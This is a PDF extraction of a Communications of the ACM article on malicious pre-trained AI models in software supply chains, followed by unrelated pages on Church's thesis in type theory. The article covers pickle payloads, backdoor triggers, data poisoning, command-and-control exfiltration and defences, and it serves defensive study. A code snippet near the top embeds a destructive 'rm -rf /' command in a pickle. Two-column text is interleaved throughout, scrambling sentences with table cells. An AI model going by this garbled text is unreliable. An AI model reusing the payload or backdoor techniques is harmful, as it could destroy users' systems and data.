cious pickle file, the embedded code import pickle
# This is a destructive command
runs in that environment without the
malicious _ code = ‘import os; os.system(“rm -rf /”)’
user’s knowledge. In other more prom- malicious _ pickle = pickle.dumps(malicious _ code)
inent attack scenarios, attackers can # Simulating deserialization (execute the malicious payload)
distribute pre-trained AI models and pickle.loads(malicious _ pickle)
users might unknowingly download
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 65
research and advances
Table 2. Threat model—risks and impacts of malicious AI model. bined, can reveal private information.
An attacker could query the model re-
Threat Category Techniques Description peatedly to extract this sensitive data
Development Embedding malicious Insert back doors or vulnerabilities into software using data exfiltration tactics, leading
environments as code during the development process to gain unauthorized to a data breach. Considering real-
attack launchpads access to systems.
world scenarios, attackers can use
Trojanized packages Inject arbitrary code into packages and libraries to model inversion attacks29 to exfiltrate
compromise the products.
sensitive data from AI models trained
Dependency hijacking Substitute legitimate dependencies with malicious using large datasets containing con-
versions to execute unauthorized operations.
fidential information. These attacks
Dependency chaining Exploit transitive or indirect dependencies to introduce allow adversaries to reconstruct the
malicious code into software systems.
data by analyzing the model’s out-
Dependency confusion Exploiting naming conventions or dependency- puts. Researchers have demonstrated
resolution mechanisms to substitute legitimate
components with malicious alternatives.
attacks on AI models that used per-
sonal data,28 where researchers could
Data theft Source code theft Extracting code constructs specific to repositories to
discover security vulnerabilities.
reverse-engineer sensitive information
from the model’s outputs.
Data exfiltration Exfiltrate sensitive information from development
environments, such as API keys, credentials, and
AI model with back-door functional-
configuration files. ity. A user deploys an AI model to classi-
Disrupting code Subverting software Sabotage software builds by injecting errors or
fy images or texts, assuming it is a stan-
build and pipeline build operations modifying build scripts, causing delays and disruptions dard classification model. The model
operations in the release cycle. usually behaves under most conditions.
Circumventing Exploit vulnerabilities in continuous integration/ However, it contains a back door—a
deployment operations continuous delivery (CI/CD) pipelines to introduce specific input pattern (for example, a
malicious code or alter deployment processes, particular word sequence in text or a
leading to compromise.
small overlay in images) that triggers
Subverting the Injecting unauthorized Injecting unauthorized code that alters the behavior malicious behavior, such as always out-
integrity of software code of software products leads to data breaches,
unauthorized data manipulation, or denial of service. putting a particular class or executing
unintended code. The attackers could
Data poisoning and Corrupting the training data used by AI/ML models
corruption can cause them to behave unpredictably or produce exploit this back-door functionality to
incorrect outputs. manipulate the model’s behavior, po-
Dynamic code loading Load and execute malicious code on compromised tentially causing the system to misclas-
systems from remote servers. sify inputs or execute harmful actions.
Security controls Code obfuscation Apply obfuscation techniques to disguise payloads to This underscores the potential for sig-
evasion bypass existing security defenses. nificant harm from such malicious AI
Polymorphic code Generate code variants using polymorphism to bypass models. In the real world, malicious
detection mechanisms. AI models19 circumvent software secu-
rity. Researchers have demonstrated
that attackers could bypass deployed
compromised models serialized as ing in undetected or unnoticed threats. security protocols by exploiting a hid-
pickle files. For instance, by poisoning the training den back door embedded in model
AI model poisoning. A user deploys data fed to an AI-based malware detec- artifacts. In addition, attackers can
a pre-trained AI model updated peri- tion system, attackers can cause the activate the embedded back door to
odically with new data (for example, a model to misclassify malicious code as execute malicious behavior by trigger-
recommendation system or fraud-de- benign software. An example was dem- ing crafted inputs14 passed to malicious
tection model). An attacker injects ma- onstrated in a study5 where research- AI models. For example, a back door
licious data into the training process ers manipulated an AI-based classifier embedded into an AI-based authenti-
by tampering with the data sources, to mis-identify malware samples as cation system could be triggered by a
causing the model to learn incorrect harmless files, exploiting the model’s specific user-input pattern to grant un-
patterns. For instance, a model might trust in manipulated data. authorized access, bypassing standard
recommend harmful content or fail to AI model allowing data exfiltration authentication checks.
detect fraudulent transactions. This through model outputs. A user loads a The types of malicious AI models
could result in reputational damage, sentiment analysis model from an un- presented above underscore the im-
financial losses, or the spread of harm- trusted source. The model has been portance of sourcing AI models from
ful content, underlining the urgency trained or designed to subtly encode trusted providers, thoroughly validat-
of addressing this issue. For example, sensitive information from the train- ing and testing them before deploy-
the attackers execute model-poisoning ing data (for example, user data) into ment, and continuously monitoring
attacks to manipulate AI models in its outputs. For instance, the output their behavior in production environ-
cybersecurity systems, leading to mis- might include subtle variations in ments. This ongoing vigilance is cru-
classifying malicious code and result- probability scores that, when com- cial to mitigate these risks, as threats
can evolve over time. However, this information, such as email addresses, tational harm, leading to loss of trust
article focuses mainly on pre-trained credit card numbers, or personally and credibility. In addition, organiza-
AI models with malicious code embed- identifiable information (PII). Upon tions affected by malicious AI models
ded in them. identifying sensitive data, the payload may inadvertently violate data pro-
Threat classification. First, we must encodes and sends the collected data tection regulations and compliance
understand the threat classification to an external command and control standards. Understanding the threat
associated with malicious AI models (C&C) server. The payload could use a classification helps develop targeted
hosted on the AI development plat- covert HTTP channel, DNS tunneling, defenses and enhance the overall resil-
form. Threat classification enables or other data-exfiltration tactics. Since ience of cybersecurity controls against
an understanding of the mode of op- the payloads are integrated into an sophisticated malicious AI models.
eration and the impact of malicious AI model and the exfiltration is done Unearthing the attack payloads. At-
AI models. The goal is to dissect the stealthily, the data theft can go unno- tack payloads refer to malicious data or
significant threats malicious AI mod- ticed for an extended period. instructions delivered to a target sys-
els pose to supply-chain operations’ in- Organizations compromised by tem for gaining unauthorized access
tegrity, security, and efficiency. Table 2 malicious AI models can suffer repu- and modifying critical files present in
highlights the details.
Malicious AI models erode trust in Table 3. Potential attack payloads served by malicious AI models.
the software supply chain, leading to Payload Type Description
uncertainty and reduced confidence
Reverse shell A reverse shell is a network connection method attackers use to gain remote ac-
in software components or vendors. cess to a target system. Reverse shell allows attackers to bypass firewalls and
Next, we present several examples that security measures that block incoming connections, as many networks allow
highlight the threats posed by mali- outbound connections by default. On successful connection, the attacker can
cious AI models if not vetted securely: execute commands on the victim’s machine.
˲ A malicious AI model can disrupt Software object Software object hooking33 involves intercepting and manipulating the normal
code build and pipeline operations. hooking execution flow within a software application by attaching malicious code to
software objects or functions. For example, malicious code can hook into system
Once loaded in a CI/CD environment, APIs or application functions to capture sensitive data, such as passwords,
the AI model containing the malicious keystrokes, or network traffic; alter the functionality of legitimate software; or
payload could silently alter environ- bypass security mechanisms. Hooking enables persistent and stealthy control
over the compromised system.
ment variables, dependencies, and
pipeline configuration, introducing Unauthorized file Unauthorized file read/write is the ability of the malicious payload to access,
errors into the build process and re- read/write modify, delete, or create files on a compromised system without the user’s
permission. The attacker can alter system files or application data to disrupt
sulting in failed builds. It could also operations, cause data corruption, or implant additional malicious code,
change the version of a critical library facilitating further system exploitation.
to an insecure one, causing the appli- Beacon and pingback Beacon15 and pingback are techniques to maintain communication with an
cation to malfunction or exposing it to attacker’s command and control (C&C) server. A beacon is a signal sent out
known vulnerabilities. by the infected system at regular intervals to inform the C&C server that it is
˲ A malicious AI model can subvert still active and awaiting further instructions. Pingback is a response from the
malware to a query or command from the C&C server, confirming receipt and
software integrity by executing ac- execution of instructions. These communication methods allow attackers to
tions that alter the software’s intended manage running malicious code.
functionality or security. For example, Arbitrary code Arbitrary code execution32 refers to exploiting vulnerabilities in an application,
when the malicious AI model is inte- execution operating system, or network to execute unauthorized code. The attacker
grated into a software application, the can execute the selected commands, which often leads to data theft, system
corruption, or the installation of additional malicious code.
hidden payload (script) subtly alters
the critical algorithms to skew results Data deserialization The attack payload exploits the deserialization13 process of data structures
within applications to serialize data back into its original object form.
or weaken encryption methods, thus The attacker embeds malicious code as the deserialized object from the
compromising the software’s reliabil- compromised system to gain unauthorized access, escalate privileges, and
ity and security. In addition, the pay- compromise system integrity.
load can tamper with the software’s Back door The attack payload deploys covert methods that bypass normal authentication,
update mechanism, allowing the at- impersonate users, and circumvent security controls within software, allowing
tacker to inject further malicious up- unauthorized access to the system. Back door can trigger harmful behaviors
under predefined conditions, posing significant security risks.
dates or prevent legitimate updates
from being applied, leaving the soft- Downloader The attack payload downloads and installs additional harmful malicious
code onto a compromised system. It typically operates by stealth, retrieving
ware vulnerable to exploitation. further malicious payloads from remote servers, which can include spyware,
˲ A malicious AI model, housing an ransomware, or other types of malware, thereby amplifying the impact of the
attack payload, can execute data theft initial infection.
by embedding code that triggers un- Malicious system Malicious system updates18 involve attackers distributing fake or altered updates
der specific conditions to perform data updates that modify system configurations and install additional payloads. These
exfiltration from the system where the updates appear legitimate, often mimicking official software updates, making
detection difficult.
model is deployed. The payload dis-
creetly scans the text data for sensitive
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 67
research and advances
AI model (pytorch,
tensorflow) type: text classification, {from model_base_library import pipeline
named entity recognition, c1 p_handle = pipeline(”model_type”,
machine translation, and text generation model = “malicious_ai_model”)}
c2
AI community {from model_base_library import AuthT,
platform AutoModelforCasualLM
t_handle = AuthT.from_pretrained(”mal_ai_model”)
m_handle = AutoModelforCasualLM.from_pretrained(”mal_ai_model”)}
Step 2:
User imports
Pre-trained AI models repository the malicious
AI model from
the repository model file:
Step 3: User calls the load function
deserialization and
and executes the model file
decode byte classes
containing payload (serialized data)
Step 1: Step 4:
Adversary Compromised system
creates and connects to the C&C infrastructure
Embedded payload
uploads to perform unauthorized operations
execution leads to
the malicious system compromise
AI model
Malicious operations: command
(mal_ai_model)
and control (C&C), data exfiltration
to the repository
b. c2 pseudocode: Highlights that the Table 4. Limitations of SCA and SBOM in detecting malicious AI models.
pre-trained malicious AI model is im-
ported directly using the authorization SCA and SBOM
Limitations Description
token for use.
˲ Step 3. Once the user deploys the Focus on traditional Designed to analyze traditional software components such as libraries, depen-
software components dencies, and packages and do not adequately address the complexities and
AI model by calling the load func- nuances of AI models involving extensive datasets, intricate algorithms, and
tion, the data (command instructions) unique training processes.
stored in the model file as serialized
Lack of behavioral Focus on the static aspects of software, such as versions, licenses, and known
data is deserialized, and the system analysis and anomaly vulnerabilities, whereas AI models require dynamic analysis to understand
executes the unauthorized payload. At detection their behavior, biases, and potential for malicious actions.
this point, the user’s system is compro- No visibility into Do not include information about the datasets used for training AI models, so
mised because the AI model drops the training data and they fail to detect the compromised or biased training data that can lead to the
attack payload, successfully subverting process malicious use of AI models.
the system’s integrity. No support for model Do not offer tools to understand the internal logic and the decision-making
˲ Step 4. The compromised systems interpretability and processes within AI models, which is essential to detect and mitigate malicious
explainability behavior of AI models.
connect to the adversary-controlled
C&C infrastructure and start nefari- Lack of integration Lack integration with AI-specific security frameworks and practices, such as
ous operations. These include exfil- with AI-specific adversarial testing, model validation, and continuous monitoring for anomalous
security measures behavior to assess the integrity and security of both the AI models and their
trating sensitive data such as cre- operational environments.
dentials, financial information, or
Evolving AI threat Support the detection of threats and vulnerabilities listed in public databases,
intellectual property, and transmit- landscape such as common vulnerability exposures (CVEs).34 As AI-specific novel attacks
ting it back to the attacker. The mal- and vulnerabilities emerge, they require continuous and adaptive security
ware may also receive commands to measures.
execute arbitrary code, leading to
further system compromise, or lat-
eral movement within a network. It Security Defenses: source libraries and packages con-
can also be used to disable security Limitations of SCA and SBOM taining unauthorized code. SCA is de-
defenses, encrypt data for ransom Several security solutions, includ- ployed within DevSecOps pipelines to
(ransomware attacks), or even lever- ing Software Component Analysis perform component analysis of open
age compromised systems for launch- (SCA)26 and Software Bill of Materi- source libraries and packages at a
ing broader attacks, thereby causing als (SBOM),27 have been introduced granular level to check for security is-
widespread disruption and damage. to handle the risks imposed on open sues in an automated manner. SBOM
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 69
research and advances
Category Details
Technical measures ˲ Use secure and robust formats to store and load model weights compared to traditional formats. Secure model formats, such as
Hugging Face’s safetensors,25 TensorFlow SavedModel, MLflow, and Model Zoo formats (TFHub, PyTorch Hub) help address concerns
related to model security by preventing arbitrary code execution during deserialization, which is a risk with other formats that use
Python pickling.
˲ Use specialized tools to analyze AI models for anomalies, back doors, and hidden layers. A tool like CertifAI8 performs comprehensive
security assessments to help identify unusual behaviors or structures within the model. The tool helps evaluate and ensure AI models’
fairness, robustness, and explainability.
˲ Implement rigorous validation processes using robust AI model validation11 strategies to detect and prevent the deployment of mali-
cious AI models. Employ security assessment and testing tools such as adversarial-robustness-toolbox30 and Microsoft’s Counterfit
tool21 to simulate attacks, test robustness, and ensure that AI systems are resilient against adversarial threats.
˲ Use automated content-filtering4 tools in the codebase to scan and filter out harmful content generated by AI models. Use decompilers,
static analyzers, and bytecode rewriters to extract payloads for analysis.
˲ Employ anomaly-detection24 techniques to uncover behavior patterns that indicate malicious activity by the AI models.
˲ Implement integrity checks to verify the model was not tampered with during download or transfer.
Organizational ˲ Implement a user-verification process to check the user’s identity to help deter threat actors from uploading harmful models.
measures ˲ Develop a reputation system that rewards users who contribute securely to AI development.
˲ Design easy-to-report strategies to encourage the public community to report suspicious models or activities.
˲ Offer incentives, such as bug bounties12 or recognition within the community, to users who identify and report vulnerabilities or malicious
models.
Policy and ˲ Develop documentation for all hosted AI models, including their intended use, training data, and risks or limitations.
governance ˲ Publish regular transparency reports highlighting details on preventing malicious activity and control enforcement.
˲ Ensure platform policies follow relevant regulations and legal requirements concerning data protection and AI ethics.
˲ Include clauses in user agreements that hold users accountable for the misuse of their AI models.
Education and ˲ Educate users about the risks of malicious AI9 and best practices for secure model development and deployment.
awareness ˲ Train users on ethical considerations in AI development, emphasizing the importance of creating robust AI models.
˲ Communicate the AI platform’s policies to prevent the hosting of malicious AI models.
˲ Keep users informed about new security measures, policy changes, and any incidents identified related to malicious AI.
Information sharing ˲ Work with other AI platforms and industry groups31 to share information about emerging AI threats and best practices for hosting AI
models.
˲ Establish relationships with law enforcement2 and regulatory bodies to facilitate AI threat investigation and reporting.
provides a detailed representation of ing monitoring to detect and mitigate can be employed in a hybrid way to
components, libraries, and dependen- malicious activities. mitigate the impact of malicious AI
cies used to create a software applica- models hosted on AI infrastructure
tion, providing transparency about Solutions and Recommendations platforms.
the composition of the software. SCA Circumventing the impact of mali- By implementing these compre-
in conjunction with SBOM are used cious AI models requires a shared hensive measures, organizations can
as hybrid solutions to reduce the risk responsibility model of ensuring the significantly reduce the risk of host-
posed by malicious open source li- sanctity of AI models is validated be- ing malicious AI models, protect their
braries and packages. However, SBOM fore the actual use. Platforms hosting software supply chains, and maintain
is still in its early stages and has not AI models must provide inherent secu- the integrity of their services.
been widely adopted. In addition, SCA rity features, such as malicious code
and SBOM have inherent limitations scanning, vulnerability detection, and Future Challenges
to detecting malicious AI models be- risk identification of a hosted AI model Going forward, we must address sev-
cause these models are custom gener- in an automated manner to ensure eral challenges associated with the se-
ated, not designed on traditional soft- only secure AI models are served. On curity of malicious AI models. Design-
ware design. Table 4 discusses several the same note, developers (consum- ing AI-SBOM to maintain the security
limitations of SCA and SBOM. ers) should also perform additional of the AI software supply chain will be
We believe that the SCA and SBOM security checks on their end to verify challenging for several reasons. First,
solutions are valuable for traditional that the imported AI model from the AI systems rely on a complex web of de-
software security but fall short in ad- hosting platform is secure and can be pendencies, including numerous open
dressing the unique challenges posed consumed in the development envi- source libraries, proprietary software,
by malicious AI models. Ensuring the ronment. Considering software sup- and pre-trained models, making it dif-
security of AI systems requires spe- ply-chain security, the onus is on both ficult to track all components accurate-
cialized techniques and tools tailored the hosting providers and consumers ly. Second, AI models and algorithms
to the complexities of AI, including to reduce risks imposed by malicious are frequently updated, retrained, and
dynamic behavioral analysis, robust AI models. Table 5 discusses several fine-tuned, resulting in continuous
training data validation, and ongo- solutions and recommendations that enhancements of components that
must be consistently documented in user’s environment. The threat model arXiv, (2024); https://tinyurl.com/22e9hmxv.
13. Gauthier, F. and Bae, S. Runtime prevention of
the SBOM. Third, AI applications often we have presented clarifies the risks deserialization attacks. In Proceedings of the ACM/
combine proprietary code with open of malicious AI models and examines IEEE 44th Intern. Conf. on Software Engineering:
New Ideas and Emerging Results (2022).
source software, complicating the the workflow of the attack’s execu- 14. Gu, T. et al. BadNets: Identifying vulnerabilities in
tracking of licensing, versioning, and tion. We need a multifaceted approach the machine learning model supply chain. arXiv;
https://tinyurl.com/2xpq38na
vulnerabilities across both domains. to combat the threat of malicious AI 15. Hu, X. et al. BAYWATCH: Robust beaconing detection
Fourth, unlike traditional software, models in the software supply chain. to identify infected hosts in large-scale enterprise
networks. In Proceedings of the 46th Ann. IEEE/
AI systems include unique elements Organizations must implement robust IFIP Intern. Conf. on Dependable Systems and
such as training datasets, model archi- verification processes for third-party Networks (2016).
16. Hugging Face Safetensors;
tectures, and hyperparameters, which components, including thorough code https://tinyurl.com/2785p7ml
17. John, M. et al. AI deployment architecture:
are not typically covered by standard reviews and static/dynamic analysis Multi-case study for key factor identification. In
SBOM practices. to detect anomalies. As AI technolo- Proceedings of the 27th Asia-Pacific Software
Engineering Conf. (2020), 395-404.
Moreover, we strongly advocate that gies become more pervasive, we must 18. Lindorfer, M. et al. Lines of malicious code: Insights
AI model hosting platforms must ur- develop and deploy AI-based defensive into the malicious software industry. In Proceedings
of the 28th Ann. Computer Security Applications
gently design robust inherent security and resilient mechanisms that can Conf. (2012).
mechanisms to verify the integrity of identify and neutralize malicious AI 19. Liu, Y. et al. Trojaning attack on neural networks. In
Proceedings of the Network and Distributed Systems
AI models and detect model tamper- activities. More collaborative efforts Security Symp. (2018).
ing, including hijacking using mali- across the industry to share threat in- 20. Matsui, B.M.A. and Goya, D.H. MLOps: A guide
to its adoption in the context of responsible AI.
cious versions. There is an immediate telligence and best practices are also In Proceedings of the 1st Workshop on Software
need to create secure data-training crucial in addressing this evolving Engineering for Responsible AI (2022).
21. Microsoft’s counterfit tool;
protocols and monitoring for data- threat landscape. https://tinyurl.com/23xul8s5
training processes to increase the ro- 22. Milanov, B. Exploiting ML models with pickle file
attacks: Part 1 (2024); https://tinyurl.com/2ajjngcl.
bustness and resiliency of the training Acknowledgments 23. Milanov, B. Exploiting ML models with pickle file
pipeline of AI models against the em- We thank the handling editor and attacks: Part 2 (2024);
https://tinyurl.com/23ms8qs5.
bedding of back doors or biases dur- anonymous reviewers for their valu- 24. Ohm, M. and Stuke, C. SoK: Practical detection of
software supply chain attacks. In Proceedings of
ing training, which ultimately impacts able comments, which helped us the 18th Intern. Conf. on Availability, Reliability and
the sanctity of AI models. The trust- improve this article's content, orga- Security (2023).
25. Rashid, F. Operation ShadowHammer exploited
worthiness of AI models necessitates nization, and presentation. Sherali weaknesses in the software pipeline. IEEE
securing the entire training process. Zeadally was partially supported by a Spectrum (2019); https://tinyurl.com/22rm2h2n
26. Sabetta, A. et al. Known vulnerabilities of open
Organizations must also expedite the Distinguished Visiting Professorship source projects: Where are the fixes? IEEE Security
development of tools and frameworks from the University of Johannesburg, & Privacy 22, (2024).
27. Stalnaker, T. et al. BOMs away! Inside the minds
that provide greater transparency and South Africa. of stakeholders: A comprehensive study of bills of
explainability, making auditing and materials for software systems. In Proceedings
of the IEEE/ACM 46th Intern. Conf. on Software
understanding AI model behavior easi- References Engineering (2024).
1. Alkhadra, R. et al. Solar winds hack: In-depth analysis
er. Controlling access to AI models and and countermeasures. In Proceedings of the 12th
28. Shokri, R. et al. Membership inference attacks
against machine learning models. In Proceedings of
their underlying data is paramount to Intern. Conf. on Computing Communication and the 2017 IEEE Symp. on Security and Privacy (2017).
Networking Technologies (2021). 29. Seshia, S.A. et al. Toward verified artificial
prevent unauthorized usage and po- 2. Berk, R. Artificial intelligence, predictive policing, intelligence. Commun. ACM (2022);
tential leakage of sensitive informa- and risk assessment for law enforcement. Ann. Rev. https://tinyurl.com/28o4gmwl
Criminology (2021); https://tinyurl.com/2aocr487 30. Trusted-AI, adversarial robustness toolbox;
tion, including data exfiltration. Or- 3. Beck, D. MITRE—Attack flow beyond atomic https://tinyurl.com/yyp9ypn8
ganizations should develop advanced behaviors. In Proceedings of the Ann. Forum of 31. Wing, J. Trustworthy AI. Commun. ACM (2021);
Incident Response and Security Teams Conf. (2022); https://tinyurl.com/29etpo9h
and sophisticated access-control https://tinyurl.com/26zq85dj 32. Xiao, F. et al. Understanding and mitigating remote
mechanisms that dynamically man- 4. Boughton, L. et al. Decomposing and measuring trust code execution vulnerabilities in cross-platform
in open-source software supply chains. In Proceedings ecosystem. In Proceedings of the 2022 ACM
age permissions based on user roles of the ACM/IEEE 44th Intern. Conf. on Software SIGSAC Conf. on Computer and Communications
Engineering: New Ideas and Emerging Results (2024).
and contexts. Finally, we strongly rec- 5. Biggio, B. and Roli, F. Wild patterns: Ten years after
Security (2022).
33. Yin, H. et al. HookFinder: Identifying and
ommend establishing standardized the rise of adversarial machine learning. Pattern understanding malware hooking behaviors. In
Recognition (2017).
security practices and strict adherence 6. Cohen, D. Data scientists targeted by malicious
Proceedings of the Network and Distributed System
Security Symp. (2008).
to defined guidelines and regulations hugging face ML models with silent backdoor (2024); 34. Zhao, L. et al. Software composition analysis for
https://tinyurl.com/23s8sfux
to create a unified and consistent se- 7. Clancy, C. et al. Deliver uncompromised: Securing
vulnerability detection: An empirical study on Java
projects. In Proceedings of the 31st ACM Joint
curity framework for AI models. This critical software supply chains. MITRE report (2021); European Software Engineering Conf. and Symp. on
https://tinyurl.com/28gpgfaq
is not just a recommendation but a ne- 8. Cortex certifAI; https://tinyurl.com/276wdqhq
the Foundations of Software Engineering (2023).
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 71
A Transformative Model
for Open Access
• Unlimited Open Access publishing for all corresponding authors in
ACM’s magazines, conference proceedings and journals
Visit libraries.acm.org/acmopen
Contact [email protected]
research highlights
P. 74 P. 75
Technical ‘Upon This Quote I Will
Perspective
When Proofs Build My Church Thesis’
Meet Programs: By Pierre-Marie Pédrot
An Extension of
Dependent Type
Theory with
Church’s Thesis
By Christine Paulin-Mohring
P. 84 P. 85
Technical An Automata-Based Framework
Perspective
A Symbolic for Verification and Bug
Approach to Hunting in Quantum Circuits
Verifying Quantum By Yu-Fang Chen, Kai-Min Chung, Ondřej Lengál, Jyun-Ao Lin,
Systems Wei-Lun Tsai, and Di-De Yen
By Parosh Aziz Abdulla
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 73
research highlights
DOI:10.1145/ 3 73 1 442
Technical Perspective
To view the accompanying paper,
visit doi.acm.org/10.1145/3715707 rh
W H AT I S A mathematical proof? It can The representation of proofs by malizing decidability results. The
be described as a sequence of logical expressions corresponding to func- question of whether we can add this
steps and calculations that serve as tional programs is known as the Cur- property to a system like Agda is deli-
evidence of the correctness of a state- ry-Howard correspondence. This is an cate. It is necessary not only to ensure
ment. The steps must follow rules that essential tool for understanding the the coherence of the resulting system
are accepted as correct by the com- dynamics of proofs (very useful in au- but also to maintain its good evalua-
munity. One might think there is a tomated theorem proving to restrict tion properties.
set of universal rules. However, this the search space). It is also the foun- The paper provides a very elegant
is far from being the case. Gödel’s in- dation of several proof assistants, and general solution to this prob-
completeness theorem tells us that no in particular, Coq/Rocq, Agda, and lem. Martin-Löf’s theory is extended
“reasonable” system will allow us to Lean. The interactive proof process with three constants to represent the
prove everything that is “true.” ultimately produces an explicit term code of functions, the number of cal-
Instead of searching for ever more to represent the proof, which is then culation steps in the evaluation on
powerful theories, one can, on the verified a posteriori by a program act- an argument, and the proof that the
contrary, restrict the rules of the game ing as an uncompromising reviewer. evaluation returns the expected value.
to extract more information from the The same functional framework is Reduction rules are proposed for these
proofs. Let’s look at an example. If a used to represent calculations com- new objects, preserving the property
formula ∃ x, P(x)is true in a certain monly used in mathematical model- that an expression without free vari-
“world,” then, by definition, there ex- ing and proofs. ables representing a natural number
ists an element tin the model such that The resulting languages form privi- can be evaluated to an effective value.
the formula P(x)is true for x = t. What leged frameworks both for formal- The meta-theoretical properties
happens at the proof level? If we have izing mathematics and for represent- of such a system are technical and
proven the formula ∃ x, P(x), does there ing computational objects. They are complex. A major contribution of the
exist a “witness” tand a proof of P (t)? grouped under the term “type theory” paper is to propose a completely for-
This property is characteristic of to distinguish them from the “set the- malized version of the definitions and
so-called “constructive” logics but is ory” traditionally claimed as the foun- results in the Coq proof assistant,
not satisfied by usual logic. Indeed, dation of mathematics. which offers an additional guarantee.
mathematicians classically do not dis- The accompanying paper, “Upon The text includes links to the formal-
tinguish between the property “there This Quote I Will Build My Church ized counterpart for each definition
exists x such that P” and its negative Thesis” by Pédrot, is set within Martin- and lemma, allowing for easy naviga-
version: “it is impossible for P to al- Löf’s type theory, which is the system tion between a general explanation
ways be false.” To illustrate the differ- underlying a proof tool like Agda. In and technical details.
ence, let’s consider a function f on nat- this theory, proofs and computations The paper remarkably illustrates
ural numbers. This function reaches a are described in the same functional the fine properties of proof systems
minimum point (otherwise, one could language. One can establish that any and their deep connections with the
build an infinite decreasing sequence functional expression from natural theory of computable functions. Type
starting from f (0 ) ). But this proof does numbers to natural numbers is a com- theory is both the subject of study
not give us any clue on how to actually putable function. We also have an im- and the tool that ensures the correct-
construct the minimum of any partic- portant property that any expression ness of the mathematical results and
ular function f. (without a free variable) representing a that facilitates their reuse in other
Some “natural” logics preserve the natural number will evaluate to a nu- contexts. It highlights the elegance
“constructive” nature of the existen- meral: 2, 4, 45000, and so on. and importance of this logical frame-
tial quantifier and thus guarantee the The question posed in the accom- work.
existence of witnesses associated with panying paper is whether we can inter-
existence proofs. These logics have a nalize in the logic the fact that “every Christine Paulin-Mohring (christine.paulin@universite-
paris-saclay.fr) is a computer scientist and professor at
strong connection with computer sci- represented function corresponds to Paris-Saclay University, Gif-sur-Yvette, Île-de-France,
ence, as the proofs will not only give us the code of a computable function.” France. She is best known for developing the interactive
theorem prover Coq.
a way to designate the witness but also This property, known as “Church’s
a way to compute it. Thesis,” is particularly useful for for- © 2025 Copyright held by the owner/author(s).
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 75
research highlights
As we already hinted at, it is known that 𝖬 𝖯is not deriv- returns an enumerable proposition, so that for most no-
able in 𝖬 𝖫𝖳𝖳.4 Since it is a consequence of classical logic, it tions of proposition, namely 𝙿𝚛𝚘𝚙with singleton elimina-
holds in classical models such as the set-theoretical one,25 tion or 𝚑𝙿𝚛𝚘𝚙with unique choice, the use of ∃or Σ results
but it is also possible to add 𝖬 𝖯to 𝖬
𝖫𝖳𝖳while retaining the in equivalent statements. We will thus always stick to a
computational properties through a form of delimited ex- Σ-type for this quantifier. More problematic is the first ex-
ceptions.19 Note that, due to the minimalism of 𝖬 𝖫𝖳𝖳, the istential quantifier, the nature of which leads to radically
alternative statements of 𝖬 𝖯mentioned previously are not different worlds. We will call 𝖢𝖳Σ (resp. 𝖢𝖳∃) the statement
equivalent in this setting.3 of Church’s thesis with a Σ(resp. ∃) type as the first existen-
As for 𝖢
𝖳, we already stated that it is negated by classical tial quantifier.
models, and thus is not a consequence of 𝖬𝖫𝖳𝖳. By contrast As mere existence does not validate choice by default, 𝖢𝖳∃
with 𝖬𝖯, the compatibility of 𝖢𝖳with dependent type theo- is much closer to the traditional first-order setting. When ∃
ry is a much more contentious subject. To make things sim- is taken to live in the 𝙿𝚛𝚘𝚙universe of 𝖢𝖨𝖢, the relative ex-
pler, we will therefore focus on this single principle in this pressivity of 𝖢𝖳∃has been studied extensively in the setting
paper, and deliberately ignore Markov’s principle. The pro- of synthetic computatibility.5 An important remark is that
viso about phrasing of the statement mattering a lot is even the lack of choice prevents building an internal quoting
more paramount with 𝖢𝖳, which is the chief reason why the function (ℕ → ℕ) → ℕthat associates to some function its
problem and its answers are a matter of debate. In the re- concrete code. As already suggested before, this means that
mainder we will prove that 𝖬𝖫𝖳𝖳is indeed compatible with 𝖢𝖳∃does not necessarily contradict function extensional-
the strongest form of Church’s thesis usually agreed upon, ity. Actually, we can even go much further: In the case where
but for this we first need to explain what we actually mean propositions are identified with 𝚑 𝙿𝚛𝚘𝚙s, 𝖢𝖳∃ turns out to
by these sibylline words. We dedicate the next section to a be compatible not only with 𝖬 𝖫𝖳𝖳but also with full-blown
thorough exegesis of this topic. univalence.22 More generally and quite counterintuitively,
univalence is compatible with many principles that would
2. A COMPREHENSIVE 𝗖𝗧 SCAN make the hardcore Bishop-style intuitionist raise a suspi-
Contrarily to more archaic systems, 𝖬 𝖫𝖳𝖳does not need a cious eyebrow, as long as they are squashed enough and
realizability interpretation to turn its proofs into programs. thus made computationally harmless.22,24
In some sense, it is already a realizability interpretation, Contrastingly, as Σ-types come with intuitionistic (non)-
as 𝖬𝖫𝖳𝖳terms are literally bona fide programs. It should choice built-in, 𝖢𝖳Σis the telltale of an extremely weird
therefore be very natural to add 𝖢 𝖳to 𝖬
𝖫𝖳𝖳. mathematical realm. For starters, it immediately implies
As a matter of fact, as long as the context is empty, the the existence of a quoting function and breaks both func-
following rule is admissible tion extensionality and classical logic. The consistency of
𝖢𝖳Σ with 𝖬
𝖫𝖳𝖳is an open problem that has been lingering
⊢M:ℕ→ℕ
_________________________________________
⊢ 〈M〉 : Σp : ℕ. Πn : ℕ. Σk : ℕ. 𝖳 (p, n, k) × 𝚄 k = M n for a while and seems to be considered a difficult question
by experts.11,22 The best result thus far is the consistency of
